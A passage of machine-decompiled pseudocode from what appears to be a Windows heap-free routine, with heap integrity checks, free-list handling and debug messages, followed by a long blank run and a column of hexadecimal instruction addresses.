																	_t1097 =  *[fs:0x30];
																	__eflags =  *(_t1097 + 0xc);
																	if( *(_t1097 + 0xc) == 0) {
																		_push("HEAP: ");
																		E1D7CB910();
																	} else {
																		E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_t1286 = _v36;
																	_push(_v72 + 0x10 + _t1286);
																	E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1286);
																	_t871 =  *[fs:0x30];
																	__eflags =  *((char*)(_t871 + 2));
																	if( *((char*)(_t871 + 2)) != 0) {
																		 *0x1d8c47a1 = 1;
																		 *0x1d8c4100 = _t1286;
																		asm("int3");
																		 *0x1d8c47a1 = 0;
																	}
																}
															}
															 *(_t1019 + 2) = 0;
															 *((char*)(_t1019 + 7)) = 0;
															_t1095 = _v48 + ( *_t1286 & 0x0000ffff);
															_v48 = _t1095;
															 *_t1019 = _t1095;
															_t1096 = _v48;
															_t861 =  *(_t1280 + 0x54) ^ _t1096;
															__eflags = _t861;
															 *(_t1019 + 4 + _t1096 * 8) = _t861;
															_t1195 = _v48;
														} else {
															_t875 = E1D7CF5C7(_t1280, _t1286);
															__eflags = _t875;
															if(_t875 != 0) {
																goto L175;
															} else {
																E1D7CF113(_t1280, _t1286,  *_t1286 & 0x0000ffff, 1);
																L192:
																_t1195 = _v48;
																continue;
															}
														}
													}
												}
												break;
											}
											L187:
											_a4 = _t1019;
											goto L188;
										}
									}
									goto L112;
								}
								L188:
								__eflags = _t1195 -  *((intOrPtr*)(_t1280 + 0x6c));
								if(_t1195 <  *((intOrPtr*)(_t1280 + 0x6c))) {
									L193:
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <=  *((intOrPtr*)(_t1280 + 0x70))) {
										L197:
										__eflags = _t1195 - 0xfe00;
										if(_t1195 > 0xfe00) {
											_t1196 = _t1019;
											_t1045 = _t1280;
											E1D7E0B10(_t1045, _t1196, _t1195);
										} else {
											__eflags = _v37;
											if(_v37 == 0) {
												_t1291 = _t1195 & 0x0000ffff;
												 *(_t1019 + 2) =  *(_t1019 + 2) & 0x000000f0;
												 *((char*)(_t1019 + 7)) = 0;
												__eflags =  *(_t1280 + 0x40) & 0x00000040;
												if(( *(_t1280 + 0x40) & 0x00000040) != 0) {
													E1D828140(_t1019 + 0x10, _t1291 * 8 - 0x10, 0xfeeefeee);
													_t577 = _t1019 + 2;
													 *_t577 =  *(_t1019 + 2) | 0x00000004;
													__eflags =  *_t577;
												}
												_t760 = _t1280 + 0xc0;
												__eflags =  *(_t1280 + 0xb4);
												if( *(_t1280 + 0xb4) == 0) {
													_t1199 =  *_t760;
												} else {
													_t1199 = E1D7D1C0E(_t1280, _t1291);
													_t760 = _t1280 + 0xc0;
												}
												while(1) {
													__eflags = _t760 - _t1199;
													if(_t760 == _t1199) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1051 =  *(_t1199 - 8);
														_v110 = _t1051;
													} else {
														_t1051 =  *(_t1199 - 8);
														_v100 = _t1051;
														__eflags =  *(_t1280 + 0x4c) & _t1051;
														if(( *(_t1280 + 0x4c) & _t1051) != 0) {
															_t1051 = _t1051 ^  *(_t1280 + 0x50);
															__eflags = _t1051;
															_v100 = _t1051;
														}
														_v110 = _t1051;
														_t1019 = _a4;
													}
													__eflags = _t1291 - (_t1051 & 0x0000ffff);
													if(_t1291 > (_t1051 & 0x0000ffff)) {
														_t1199 =  *_t1199;
														_t760 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t761 = _t1019 + 8;
												_t1045 =  *(_t1199 + 4);
												_t1286 =  *_t1045;
												__eflags = _t1286 - _t1199;
												if(_t1286 != _t1199) {
													__eflags = 0;
													_t1045 = 0xd;
													E1D895FED(0xd, 0, _t1199, 0, _t1286, 0);
												} else {
													 *_t761 = _t1199;
													 *(_t761 + 4) = _t1045;
													 *_t1045 = _t761;
													 *(_t1199 + 4) = _t761;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1196 =  *(_t1280 + 0xb4);
												__eflags = _t1196;
												if(_t1196 != 0) {
													_t1050 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t768 =  *(_t1196 + 4);
														__eflags = _t1050 - _t768;
														if(_t1050 < _t768) {
															break;
														}
														_t1286 =  *_t1196;
														__eflags = _t1286;
														if(_t1286 != 0) {
															_t1196 = _t1286;
															continue;
														} else {
															_t1050 = _t768 - 1;
														}
														break;
													}
													_v208 = _t1050;
													_t1045 = _t1280;
													E1D7D1B5D(_t1045, _t1196, 1, _t1019 + 8, _t1050,  *_t1019 & 0x0000ffff);
												}
											} else {
												_t777 = _t1195 & 0x0000ffff;
												_v32 = _t777;
												 *(_t1019 + 2) = 0;
												 *((char*)(_t1019 + 7)) = 0;
												_t1202 = _t1280 + 0xc0;
												_t1292 =  *(_t1280 + 0xb4);
												_v44 = _t1292;
												__eflags = _t1292;
												if(_t1292 == 0) {
													_t1053 =  *_t1202;
												} else {
													while(1) {
														_t1056 =  *((intOrPtr*)(_t1292 + 4));
														__eflags = _t777 - _t1056;
														if(_t777 < _t1056) {
															goto L203;
														}
														_t842 =  *_t1292;
														__eflags = _t842;
														if(_t842 != 0) {
															_t1292 = _t842;
															_v44 = _t1292;
															_t777 = _v32;
															continue;
														} else {
															_t777 = _t1056 - 1;
															while(1) {
																L203:
																_v52 = _t777;
																_v144 = _t777;
																_v36 = _t777 -  *(_t1292 + 0x14);
																_v96 = 0;
																_t1215 =  *(_t1292 + 0x18);
																_v80 = _t1215;
																_t801 =  *((intOrPtr*)(_t1215 + 4));
																__eflags = _t1215 - _t801;
																if(_t1215 != _t801) {
																	goto L205;
																}
																_t1053 = _t1215;
																L244:
																__eflags = _t1053;
																if(_t1053 == 0) {
																	L247:
																	_t1292 =  *_t1292;
																	_v44 = _t1292;
																	_t777 =  *(_t1292 + 0x14);
																	continue;
																}
																_t1202 = _t1280 + 0xc0;
																goto L250;
																L205:
																_t802 = _t801 + 0xfffffff8;
																_v72 = _t802;
																_t1026 =  *_t802;
																_v300 = _t1026;
																__eflags =  *(_t1280 + 0x4c);
																if( *(_t1280 + 0x4c) != 0) {
																	_t1026 = _t1026 ^  *(_t1280 + 0x50);
																	_v300 = _t1026;
																	__eflags = _t1026 >> 0x18 - (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026);
																	if(_t1026 >> 0x18 != (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026)) {
																		E1D895FED(3, _t1280, _v72, 0, 0, 0);
																		_t1215 = _v80;
																	}
																}
																_t1058 = _v32 - (_t1026 & 0x0000ffff);
																_v244 = _t1058;
																__eflags = _t1058;
																if(_t1058 <= 0) {
																	_t805 =  *_t1215 + 0xfffffff8;
																	_v72 = _t805;
																	_t1027 =  *_t805;
																	_v308 = _t1027;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t1027 = _t1027 ^  *(_t1280 + 0x50);
																		_v308 = _t1027;
																		__eflags = _t1027 >> 0x18 - (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027);
																		if(_t1027 >> 0x18 != (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027)) {
																			E1D895FED(3, _t1280, _v72, 0, 0, 0);
																			_t1215 = _v80;
																		}
																	}
																	_t1060 = _v32 - (_t1027 & 0x0000ffff);
																	_v248 = _t1060;
																	__eflags = _t1060;
																	if(_t1060 > 0) {
																		__eflags =  *_t1292;
																		if( *_t1292 != 0) {
																			L228:
																			_t1061 = _v36;
																			_t1217 = _t1061 >> 5;
																			_v124 = ( *((intOrPtr*)(_t1292 + 4)) -  *(_t1292 + 0x14) >> 5) - 1;
																			_t812 =  *((intOrPtr*)(_t1292 + 0x1c)) + _t1217 * 4;
																			_t1030 = (_t1027 | 0xffffffff) << (_t1061 & 0x0000001f) &  *_t812;
																			__eflags = _t1030;
																			_t1063 = _v124;
																			while(1) {
																				_v200 = _t812;
																				_v140 = _t1217;
																				__eflags = _t1030;
																				if(_t1030 != 0) {
																					break;
																				}
																				__eflags = _t1217 - _t1063;
																				if(_t1217 > _t1063) {
																					__eflags = _t1030;
																					if(_t1030 == 0) {
																						_t1019 = _a4;
																						goto L247;
																					} else {
																						break;
																					}
																				} else {
																					_t812 =  &(_t812[1]);
																					_t1030 =  *_t812;
																					_t1217 = _t1217 + 1;
																					continue;
																				}
																				goto L244;
																			}
																			__eflags = _t1030;
																			if(_t1030 == 0) {
																				_t815 = _t1030 >> 0x00000010 & 0x000000ff;
																				__eflags = _t815;
																				if(_t815 == 0) {
																					_t817 = ( *((_t1030 >> 0x18) + 0x1d7a89b0) & 0x000000ff) + 0x18;
																					__eflags = _t817;
																				} else {
																					_t817 = ( *(_t815 + 0x1d7a89b0) & 0x000000ff) + 0x10;
																				}
																			} else {
																				_t820 = _t1030 & 0x000000ff;
																				__eflags = _t1030;
																				if(_t1030 == 0) {
																					_t817 = ( *((_t1030 >> 0x00000008 & 0x000000ff) + 0x1d7a89b0) & 0x000000ff) + 8;
																				} else {
																					_t817 =  *(_t820 + 0x1d7a89b0) & 0x000000ff;
																				}
																			}
																			_t1219 = (_t1217 << 5) + _t817;
																			_v140 = _t1219;
																			__eflags =  *(_t1292 + 8);
																			if( *(_t1292 + 8) != 0) {
																				_t1219 = _t1219 + _t1219;
																				__eflags = _t1219;
																			}
																			_t1053 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1219 * 4);
																			goto L243;
																		} else {
																			__eflags = _v52 -  *((intOrPtr*)(_t1292 + 4)) - 1;
																			if(_v52 !=  *((intOrPtr*)(_t1292 + 4)) - 1) {
																				goto L228;
																			} else {
																				_t1069 = _v36;
																				__eflags =  *(_t1292 + 8);
																				if( *(_t1292 + 8) != 0) {
																					_t1069 = _t1069 + _t1069;
																					__eflags = _t1069;
																				}
																				_t1298 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1069 * 4);
																				while(1) {
																					__eflags = _t1215 - _t1298;
																					if(_t1215 == _t1298) {
																						break;
																					}
																					_t1220 = _t1298 - 8;
																					_t1033 =  *(_t1298 - 8);
																					_v316 = _t1033;
																					__eflags =  *(_t1280 + 0x4c);
																					if( *(_t1280 + 0x4c) != 0) {
																						_t1033 = _t1033 ^  *(_t1280 + 0x50);
																						_v316 = _t1033;
																						__eflags = _t1033 >> 0x18 - (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033);
																						if(_t1033 >> 0x18 != (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033)) {
																							E1D895FED(3, _t1280, _t1220, 0, 0, 0);
																						}
																					}
																					_t1071 = _v32 - (_t1033 & 0x0000ffff);
																					_v252 = _t1071;
																					__eflags = _t1071;
																					if(_t1071 > 0) {
																						_t1298 =  *_t1298;
																						_t1215 = _v80;
																						continue;
																					} else {
																						_t1053 = _t1298;
																						_t1292 = _v44;
																					}
																					goto L243;
																				}
																				_t1053 = _v96;
																				_t1292 = _v44;
																				goto L243;
																			}
																		}
																	} else {
																		_t1053 =  *_t1215;
																		goto L243;
																	}
																} else {
																	_t1053 = _t1215;
																	L243:
																	_t1019 = _a4;
																}
																goto L244;
															}
														}
														goto L203;
													}
													goto L203;
												}
												L250:
												_t1293 = _v32;
												while(1) {
													__eflags = _t1202 - _t1053;
													if(_t1202 == _t1053) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1214 =  *(_t1053 - 8);
														_v108 = _t1214;
													} else {
														_t1214 =  *(_t1053 - 8);
														_v76 = _t1214;
														__eflags =  *(_t1280 + 0x4c) & _t1214;
														if(( *(_t1280 + 0x4c) & _t1214) != 0) {
															_t1214 = _t1214 ^  *(_t1280 + 0x50);
															__eflags = _t1214;
															_v76 = _t1214;
														}
														_v108 = _t1214;
														_t1019 = _a4;
													}
													__eflags = _t1293 - (_t1214 & 0x0000ffff);
													if(_t1293 > (_t1214 & 0x0000ffff)) {
														_t1053 =  *_t1053;
														_t1202 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t1196 = _t1019 + 8;
												_v96 = _t1196;
												_t778 =  *(_t1053 + 4);
												_t1286 =  *_t778;
												__eflags = _t1286 - _t1053;
												if(_t1286 != _t1053) {
													_t1196 = 0;
													__eflags = 0;
													_t513 = _t1196 + 0xd; // 0xd
													E1D895FED(_t513, 0, _t1053, 0, _t1286, 0);
												} else {
													 *_t1196 = _t1053;
													 *(_t1196 + 4) = _t778;
													 *_t778 = _t1196;
													 *(_t1053 + 4) = _t1196;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1045 =  *(_t1280 + 0xb4);
												_v52 = _t1045;
												__eflags = _t1045;
												if(_t1045 != 0) {
													_t1294 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t1203 =  *((intOrPtr*)(_t1045 + 4));
														__eflags = _t1294 - _t1203;
														if(_t1294 < _t1203) {
															break;
														}
														_t798 =  *_t1045;
														__eflags = _t798;
														if(_t798 != 0) {
															_t1045 = _t798;
															_v52 = _t1045;
															continue;
														} else {
															_t1294 = _t1203 - 1;
														}
														break;
													}
													_v204 = _t1294;
													_v72 =  *_t1019 & 0x0000ffff;
													_t1205 = _t1294 -  *((intOrPtr*)(_t1045 + 0x14));
													_v32 = _t1205;
													__eflags =  *(_t1045 + 8);
													_t782 = _t1205 + _t1205;
													if( *(_t1045 + 8) == 0) {
														_t782 = _t1205;
													}
													 *((intOrPtr*)(_t1045 + 0xc)) =  *((intOrPtr*)(_t1045 + 0xc)) + 1;
													_v56 = _t782 << 2;
													_v84 =  *((intOrPtr*)(_v56 +  *((intOrPtr*)(_t1045 + 0x20))));
													__eflags = _t1294 -  *((intOrPtr*)(_t1045 + 4)) - 1;
													_t1196 = _v32;
													if(_t1294 ==  *((intOrPtr*)(_t1045 + 4)) - 1) {
														_t535 = _t1045 + 0x10;
														 *_t535 =  *(_t1045 + 0x10) + 1;
														__eflags =  *_t535;
													}
													_t1295 = _v84;
													__eflags = _t1295;
													if(_t1295 == 0) {
														L277:
														_t788 =  *((intOrPtr*)(_t1045 + 0x20));
														_t1045 = _v56;
														 *(_t1045 + _t788) = _v96;
														_t1286 = _v84;
													} else {
														_t1023 =  *(_t1295 - 8);
														_v324 = _t1023;
														__eflags =  *(_t1280 + 0x4c);
														if( *(_t1280 + 0x4c) != 0) {
															_t1023 = _t1023 ^  *(_t1280 + 0x50);
															_v324 = _t1023;
															__eflags = _t1023 >> 0x18 - (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023);
															if(_t1023 >> 0x18 != (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023)) {
																E1D895FED(3, _t1280, _t1295 - 8, 0, 0, 0);
																_t1045 = _v52;
															}
															_t1196 = _v32;
														}
														_t1025 = _v72 - (_t1023 & 0x0000ffff);
														_v256 = _t1025;
														__eflags = _t1025;
														_t1019 = _a4;
														if(_t1025 <= 0) {
															goto L277;
														}
													}
													__eflags = _t1286;
													if(_t1286 == 0) {
														_t1286 = _t1196 >> 5;
														_v32 = _t1196 & 0x0000001f;
														_t1045 = _v32;
														_t1196 = 1 << _t1045;
														_t790 =  *((intOrPtr*)(_v52 + 0x1c));
														_t558 = _t790 + _t1286 * 4;
														 *_t558 =  *(_t790 + _t1286 * 4) | 0x00000001;
														__eflags =  *_t558;
													}
												}
											}
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
											}
										}
										_t1197 = _t1196 | 0xffffffff;
										__eflags = _v64;
										if(_v64 != 0) {
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
												if(__eflags != 0) {
													_push(_t1045);
													_t1197 = _t1019;
													E1D88D646(_t1019, _t1280, _t1197, _t1280, _t1286, __eflags);
												}
											}
											_t1047 =  *(_t1019 + 2) | 0x00000002;
											 *(_t1019 + 2) = _t1047;
											_t1290 = _t1019 + ( *_t1019 & 0x0000ffff) * 8;
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 1) ^ _t1047 ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *_t1019;
											}
											 *((short*)(_t1290 - 4)) = _v64;
											 *((short*)(_t1290 - 2)) = 0;
											__eflags =  *(_t1280 + 0x40) & 0x08000000;
											if(( *(_t1280 + 0x40) & 0x08000000) != 0) {
												 *((short*)(_t1290 - 2)) = E1D7FFDB9(1, _t1197);
											}
											goto L315;
										}
									} else {
										__eflags = _t1195 - 0x200;
										if(_t1195 < 0x200) {
											goto L197;
										} else {
											__eflags =  *(_t1280 + 0x54) -  *(_t1019 + 4);
											if( *(_t1280 + 0x54) !=  *(_t1019 + 4)) {
												goto L197;
											} else {
												_t1197 = _t1019;
												E1D7CF113(_t1280, _t1197, _t1195, 0);
												_v64 = 0;
												goto L315;
											}
										}
									}
								} else {
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <  *((intOrPtr*)(_t1280 + 0x70))) {
										goto L193;
									} else {
										_t1197 = _t1019;
										E1D7CF113(_t1280, _t1197, _t1195, 0);
										L315:
										__eflags = _t1197 | 0xffffffff;
									}
								}
								_t1288 = 0;
								_a4 = 0;
							}
						} else {
							_t1175 =  *(_t1280 + 0xc8);
							_t1191 =  *[fs:0x18];
							asm("lock btr dword [eax], 0x0");
							if(__eflags >= 0) {
								__eflags =  *((intOrPtr*)(_t1175 + 0xc)) -  *((intOrPtr*)(_t1191 + 0x24));
								if( *((intOrPtr*)(_t1175 + 0xc)) !=  *((intOrPtr*)(_t1191 + 0x24))) {
									_v132 = 0;
									__eflags =  *0x1d8c5da8;
									if( *0x1d8c5da8 == 0) {
										E1D7DFED0( *(_t1280 + 0xc8));
										_t1175 = _t1280;
										E1D809CEB(_t1175, 1);
										goto L24;
									} else {
										_v85 = 0;
										 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000194;
										_t1319 =  *[fs:0x18];
										_v224 = _t1319;
										 *((intOrPtr*)(_t1319 + 0x34)) = E1D7FABA0(0xc0000194);
										_v156 = 0;
										_t1288 = 0;
										_a4 = 0;
										L350:
										__eflags = _t1191 | 0xffffffff;
									}
								} else {
									 *(_t1175 + 8) =  *(_t1175 + 8) + 1;
									_v132 = 1;
									 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
									goto L24;
								}
							} else {
								 *((intOrPtr*)(_t1175 + 0xc)) =  *((intOrPtr*)(_t1191 + 0x24));
								 *(_t1175 + 8) = 1;
								_v132 = 1;
								 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
								L24:
								_v85 = 1;
								_v38 = 1;
								_t1019 = _a4;
								__eflags =  *(_t1280 + 0x4c);
								if( *(_t1280 + 0x4c) != 0) {
									 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
									__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
									if(__eflags != 0) {
										_push(_t1175);
										E1D88D646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
									}
								}
								_t1176 =  *_t1019 & 0x0000ffff;
								_t998 =  *(_t1280 + 0xb4);
								while(1) {
									_t1318 =  *((intOrPtr*)(_t998 + 4));
									__eflags = _t1176 - _t1318;
									if(_t1176 < _t1318) {
										_v160 = _t1176;
										_t1275 = _t1176;
										break;
									}
									_t1274 =  *_t998;
									__eflags = _t1274;
									if(_t1274 != 0) {
										_t998 = _t1274;
										continue;
									} else {
										_t1275 = _t1318 - 1;
										_v160 = _t1275;
									}
									break;
								}
								__eflags = _t1275 - _t1318;
								if(_t1275 >= _t1318) {
									L37:
									_v136 = 0;
								} else {
									__eflags = _t1176 - _t1275;
									if(_t1176 != _t1275) {
										goto L37;
									} else {
										_t1177 = _t1176 -  *((intOrPtr*)(_t998 + 0x14));
										__eflags =  *(_t998 + 8);
										if( *(_t998 + 8) != 0) {
											_t1177 = _t1177 + _t1177;
											__eflags = _t1177;
										}
										_v136 =  *((intOrPtr*)(_t998 + 0x20)) + _t1177 * 4;
									}
								}
								goto L42;
							}
						}
						_v8 = 0xfffffffe;
						E1D7E5050(_t1280, _t1288);
						 *[fs:0x0] = _v20;
						return _v156;
					} else {
						_v37 = 0;
						_t1285 = 4;
						__eflags = _t1188 & 0x61000000;
						if((_t1188 & 0x61000000) == 0) {
							goto L7;
						} else {
							__eflags = _t1188 & 0x10000000;
							if(__eflags != 0) {
								goto L7;
							} else {
								_t1015 = E1D87F8F8(_t1018, __ecx, _t1188, __ecx, 4, __eflags, _a8);
								 *[fs:0x0] = _v20;
								return _t1015;
							}
						}
					}
				} else {
					E1D895FED(9, __ecx, _t690, 0, 0, 0);
					 *[fs:0x0] = _v20;
					return 0;
				}
			}






















































































































































































































































































                                                                                                                                                                                          0x1d7e3c60
                                                                                                                                                                                          0x1d7e3c65
                                                                                                                                                                                          0x1d7e3c67
                                                                                                                                                                                          0x1d7e3c6c
                                                                                                                                                                                          0x1d7e3c77
                                                                                                                                                                                          0x1d7e3c78
                                                                                                                                                                                          0x1d7e3c7e
                                                                                                                                                                                          0x1d7e3c81
                                                                                                                                                                                          0x1d7e3c86
                                                                                                                                                                                          0x1d7e3c8b
                                                                                                                                                                                          0x1d7e3c8f
                                                                                                                                                                                          0x1d7e3c95
                                                                                                                                                                                          0x1d7e3c97
                                                                                                                                                                                          0x1d7e3c9d
                                                                                                                                                                                          0x1d7e3ca1
                                                                                                                                                                                          0x1d7e3ca5
                                                                                                                                                                                          0x1d7e3caf
                                                                                                                                                                                          0x1d7e3cb9
                                                                                                                                                                                          0x1d7e3cc0
                                                                                                                                                                                          0x1d7e3cc7
                                                                                                                                                                                          0x1d7e3cd3
                                                                                                                                                                                          0x1d7e3cd7
                                                                                                                                                                                          0x1d7e3cdc
                                                                                                                                                                                          0x1d7e3d07
                                                                                                                                                                                          0x1d7e3d0a
                                                                                                                                                                                          0x1d7e3d0d
                                                                                                                                                                                          0x1d7e3d13
                                                                                                                                                                                          0x1d7e3d4a
                                                                                                                                                                                          0x1d7e3d4f
                                                                                                                                                                                          0x1d7e3d55
                                                                                                                                                                                          0x1d7e3d58
                                                                                                                                                                                          0x1d7e3d5a
                                                                                                                                                                                          0x1d7e3d71
                                                                                                                                                                                          0x1d7e3d71
                                                                                                                                                                                          0x1d7e3d5c
                                                                                                                                                                                          0x1d7e3d5c
                                                                                                                                                                                          0x1d7e3d5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3d61
                                                                                                                                                                                          0x1d7e3d6a
                                                                                                                                                                                          0x1d7e3d6a
                                                                                                                                                                                          0x1d7e3d5f
                                                                                                                                                                                          0x1d7e3d76
                                                                                                                                                                                          0x1d7e3d79
                                                                                                                                                                                          0x1d7e3db4
                                                                                                                                                                                          0x1d7e3db4
                                                                                                                                                                                          0x1d7e3d7b
                                                                                                                                                                                          0x1d7e3d7b
                                                                                                                                                                                          0x1d7e3d81
                                                                                                                                                                                          0x1d7e3d88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3d8a
                                                                                                                                                                                          0x1d7e3d96
                                                                                                                                                                                          0x1d7e3d9d
                                                                                                                                                                                          0x1d7e3d9f
                                                                                                                                                                                          0x1d7e3da2
                                                                                                                                                                                          0x1d7e3da8
                                                                                                                                                                                          0x1d7e3daa
                                                                                                                                                                                          0x1d7e3daf
                                                                                                                                                                                          0x1d7e3daf
                                                                                                                                                                                          0x1d7e3da2
                                                                                                                                                                                          0x1d7e3d88
                                                                                                                                                                                          0x1d7e3db7
                                                                                                                                                                                          0x1d7e3dbe
                                                                                                                                                                                          0x1d7e3dc1
                                                                                                                                                                                          0x1d7e3f07
                                                                                                                                                                                          0x1d7e3f0b
                                                                                                                                                                                          0x1d7e3f10
                                                                                                                                                                                          0x1d7e3f1a
                                                                                                                                                                                          0x1d7e3f1d
                                                                                                                                                                                          0x1d7e3f1f
                                                                                                                                                                                          0x1d7e3f24
                                                                                                                                                                                          0x1d7e3f24
                                                                                                                                                                                          0x1d7e3f1d
                                                                                                                                                                                          0x1d7e3f29
                                                                                                                                                                                          0x1d7e3f29
                                                                                                                                                                                          0x1d7e3f2c
                                                                                                                                                                                          0x1d7e3f2e
                                                                                                                                                                                          0x1d7e3f30
                                                                                                                                                                                          0x1d7e3f32
                                                                                                                                                                                          0x1d7e3f32
                                                                                                                                                                                          0x1d7e3f34
                                                                                                                                                                                          0x1d7e3f34
                                                                                                                                                                                          0x1d7e3f36
                                                                                                                                                                                          0x1d7e3f3a
                                                                                                                                                                                          0x1d7e4e3d
                                                                                                                                                                                          0x1d7e4e40
                                                                                                                                                                                          0x1d7e4e43
                                                                                                                                                                                          0x1d7e4e46
                                                                                                                                                                                          0x1d7e4e53
                                                                                                                                                                                          0x1d7e4e56
                                                                                                                                                                                          0x1d7e4e5c
                                                                                                                                                                                          0x1d7e4e5e
                                                                                                                                                                                          0x1d7e4e61
                                                                                                                                                                                          0x1d7e4e63
                                                                                                                                                                                          0x1d7e4e66
                                                                                                                                                                                          0x1d7e4e68
                                                                                                                                                                                          0x1d7e4e75
                                                                                                                                                                                          0x1d7e4e7a
                                                                                                                                                                                          0x1d7e4e7c
                                                                                                                                                                                          0x1d7e4e7f
                                                                                                                                                                                          0x1d7e4e6a
                                                                                                                                                                                          0x1d7e4e6a
                                                                                                                                                                                          0x1d7e4e6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4e6e
                                                                                                                                                                                          0x1d7e4e6e
                                                                                                                                                                                          0x1d7e4e70
                                                                                                                                                                                          0x1d7e4e70
                                                                                                                                                                                          0x1d7e4e6c
                                                                                                                                                                                          0x1d7e4e84
                                                                                                                                                                                          0x1d7e4e88
                                                                                                                                                                                          0x1d7e4e90
                                                                                                                                                                                          0x1d7e4e93
                                                                                                                                                                                          0x1d7e4e99
                                                                                                                                                                                          0x1d7e4e9e
                                                                                                                                                                                          0x1d7e4ea7
                                                                                                                                                                                          0x1d7e4eb2
                                                                                                                                                                                          0x1d7e4eb4
                                                                                                                                                                                          0x1d7e4eb4
                                                                                                                                                                                          0x1d7e4e9e
                                                                                                                                                                                          0x1d7e4eb9
                                                                                                                                                                                          0x1d7e4ebb
                                                                                                                                                                                          0x1d7e4ebe
                                                                                                                                                                                          0x1d7e4ec2
                                                                                                                                                                                          0x1d7e4ec4
                                                                                                                                                                                          0x1d7e4eca
                                                                                                                                                                                          0x1d7e4ecf
                                                                                                                                                                                          0x1d7e4ecf
                                                                                                                                                                                          0x1d7e4ed6
                                                                                                                                                                                          0x1d7e4ed9
                                                                                                                                                                                          0x1d7e4edf
                                                                                                                                                                                          0x1d7e4ee4
                                                                                                                                                                                          0x1d7e4ee6
                                                                                                                                                                                          0x1d7e4f01
                                                                                                                                                                                          0x1d7e4ee8
                                                                                                                                                                                          0x1d7e4ef1
                                                                                                                                                                                          0x1d7e4ef6
                                                                                                                                                                                          0x1d7e4ef9
                                                                                                                                                                                          0x1d7e4ef9
                                                                                                                                                                                          0x1d7e4f06
                                                                                                                                                                                          0x1d7e4f09
                                                                                                                                                                                          0x1d7e4f11
                                                                                                                                                                                          0x1d7e4f11
                                                                                                                                                                                          0x1d7e4f16
                                                                                                                                                                                          0x1d7e4f26
                                                                                                                                                                                          0x1d7e4f2e
                                                                                                                                                                                          0x1d7e4f34
                                                                                                                                                                                          0x1d7e4f39
                                                                                                                                                                                          0x1d7e4f3b
                                                                                                                                                                                          0x1d7e4f50
                                                                                                                                                                                          0x1d7e4f3d
                                                                                                                                                                                          0x1d7e4f46
                                                                                                                                                                                          0x1d7e4f4b
                                                                                                                                                                                          0x1d7e4f4b
                                                                                                                                                                                          0x1d7e4f55
                                                                                                                                                                                          0x1d7e4f58
                                                                                                                                                                                          0x1d7e4f5a
                                                                                                                                                                                          0x1d7e4f60
                                                                                                                                                                                          0x1d7e4f67
                                                                                                                                                                                          0x1d7e4f69
                                                                                                                                                                                          0x1d7e4f6e
                                                                                                                                                                                          0x1d7e4f70
                                                                                                                                                                                          0x1d7e4f82
                                                                                                                                                                                          0x1d7e4f72
                                                                                                                                                                                          0x1d7e4f7b
                                                                                                                                                                                          0x1d7e4f7b
                                                                                                                                                                                          0x1d7e4f92
                                                                                                                                                                                          0x1d7e4f9c
                                                                                                                                                                                          0x1d7e4fa1
                                                                                                                                                                                          0x1d7e4fa1
                                                                                                                                                                                          0x1d7e4fa6
                                                                                                                                                                                          0x1d7e4fa6
                                                                                                                                                                                          0x1d7e4fa9
                                                                                                                                                                                          0x1d7e4fae
                                                                                                                                                                                          0x1d7e4fb0
                                                                                                                                                                                          0x1d7e4fc5
                                                                                                                                                                                          0x1d7e4fb2
                                                                                                                                                                                          0x1d7e4fbb
